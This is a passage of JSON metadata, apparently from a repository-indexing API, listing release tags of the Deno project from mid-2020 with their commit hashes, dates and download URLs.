ished_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_